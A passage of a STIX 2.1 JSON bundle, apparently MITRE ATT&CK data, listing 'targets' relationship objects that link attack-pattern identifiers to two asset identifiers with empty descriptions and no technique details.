"target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e2e67b2-2a3a-4673-8b16-96850adfcae9", "created": "2024-07-01T10:37:15.824264", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824266", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d5f8a54-b9fb-4c43-8189-ca9810aafd4c", "created": "2024-07-01T10:37:15.824274", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824276", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee69269e-96e8-431b-968c-2366aaab6e77", "created": "2024-07-01T10:37:15.824285", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824287", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f63e3770-cb06-4ff7-bb63-7fd32f6ac4d6", "created": "2024-07-01T10:37:15.824295", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824297", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afae9d30-4ee7-47a3-9600-6e8057b2b2ee", "created": "2024-07-01T10:37:15.824305", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824307", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbb5511b-e465-4f8a-8179-02da513ec6dd", "created": "2024-07-01T10:37:15.824315", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824318", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9c17a591-9caa-4b08-9eca-6fd993635faf", "created": "2024-07-01T10:37:15.824326", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824328", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1d41e32-b08d-4f4d-b1fb-775d738c64eb", "created": "2024-07-01T10:37:15.824336", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824338", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c90ce2c1-09e4-450a-bfec-4574e645a262", "created": "2024-07-01T10:37:15.824346", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824348", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dfdf52eb-f0ea-451d-bb54-a77641cef889", "created": "2024-07-01T10:37:15.824356", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824358", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14d663dc-6e0b-4a38-b170-ee10bdb2fd9e", "created": "2024-07-01T10:37:15.824367", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824369", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae7dc159-6934-43fa-a588-889c3acba813", "created": "2024-07-01T10:37:15.824377", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824379", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72c8acf2-1bd6-40f8-a913-5a0f7938d947", "created": "2024-07-01T10:37:15.824387", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824389", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--63370a4c-5d57-4906-95e1-29f98cb80010", "created": "2024-07-01T10:37:15.824397", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824399", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--20ba52aa-eeaa-46fb-920f-4ebd6e3dfd37", "created": "2024-07-01T10:37:15.824407", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824409", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e40e71cf-99fb-4315-b1c3-0e4a50a271ae", "created": "2024-07-01T10:37:15.824418", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824420", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b97f88d-e047-401d-91ae-0ca1a45770a2", "created": "2024-07-01T10:37:15.824428", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824430", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--669b6fd1-c9fc-4536-a74c-0443c4645247", "created": "2024-07-01T10:37:15.824438", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824440", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ef6d665-7db0-44e0-83a7-2cfd10042711", "created": "2024-07-01T10:37:15.824448", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824450", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b53fd050-95f8-4286-8926-6bd6659c540f", "created": "2024-07-01T10:37:15.824458", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824460", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60e9ea6a-c823-4a2e-808a-bab615b8ca8b", "created": "2024-07-01T10:37:15.824469", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824471", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e8645ba0-abf2-42e2-9259-d00a7a72d8ce", "created": "2024-07-01T10:37:15.824479", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824481", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a98235de-af92-4f5b-8dc8-0f04cefa1ac2", "created": "2024-07-01T10:37:15.824490", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824492", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc30e295-fe27-47a2-91f5-d2344daea675", "created": "2024-07-01T10:37:15.824500", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824503", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--218f1c83-7686-47bc-833d-cd6504297c70", "created": "2024-07-01T10:37:15.824511", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824513", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5696d670-c39d-4e86-8434-444115d760c4", "created": "2024-07-01T10:37:15.824521", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824523", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--490c3561-10ec-4ddf-80b5-ae64f06836c6", "created": "2024-07-01T10:37:15.824531", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824533", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2211670-0756-4f37-a4b0-be46ea28e585", "created": "2024-07-01T10:37:15.824541", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824543", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60074dcc-4452-4431-aad5-40239975aba9", "created": "2024-07-01T10:37:15.824551", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824553", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d6901a65-0ec3-40e5-ade5-b50c8578154a", "created": "2024-07-01T10:37:15.824561", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824563", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da6ad59a-92e7-412f-b7f8-40380435f21a", "created": "2024-07-01T10:37:15.824571", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824573", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a3de522-3650-45e9-aa81-6137cc66ff3f", "created": "2024-07-01T10:37:15.824582", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824584", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3bbc43f2-cb36-4b19-b6f6-1fef5ed9c8f8", "created": "2024-07-01T10:37:15.824593", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824595", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77c9a1ed-c26d-4cf4-a9d9-9fb37afef106", "created": "2024-07-01T10:37:15.824654", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824656", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ad70d780-2991-4168-9013-59efeeebeeea", "created": "2024-07-01T10:37:15.824665", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824668", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d7e42367-1db9-4b5d-bc5f-033f7586f251", "created": "2024-07-01T10:37:15.824676", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824678", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43cc3817-2db4-43df-94e2-ab06ba19f2a5", "created": "2024-07-01T10:37:15.824686", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824688", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ebaef4c-a37d-4501-b8b3-03d49ceabcd2", "created": "2024-07-01T10:37:15.824697", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824699", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2b09461-663e-4c51-9b41-f84dade3c946", "created": "2024-07-01T10:37:15.824707", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824709", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--634dbca5-d0c3-40d6-b936-e1db60560d0a", "created": "2024-07-01T10:37:15.824717", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824719", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9918e427-5fd9-44bf-bcb4-b0dd1f1496a5", "created": "2024-07-01T10:37:15.824727", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824729", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, 